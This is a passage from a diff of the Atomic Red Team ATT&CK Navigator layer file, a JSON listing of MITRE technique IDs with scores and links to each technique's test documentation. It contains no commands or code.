Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator 
Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View 
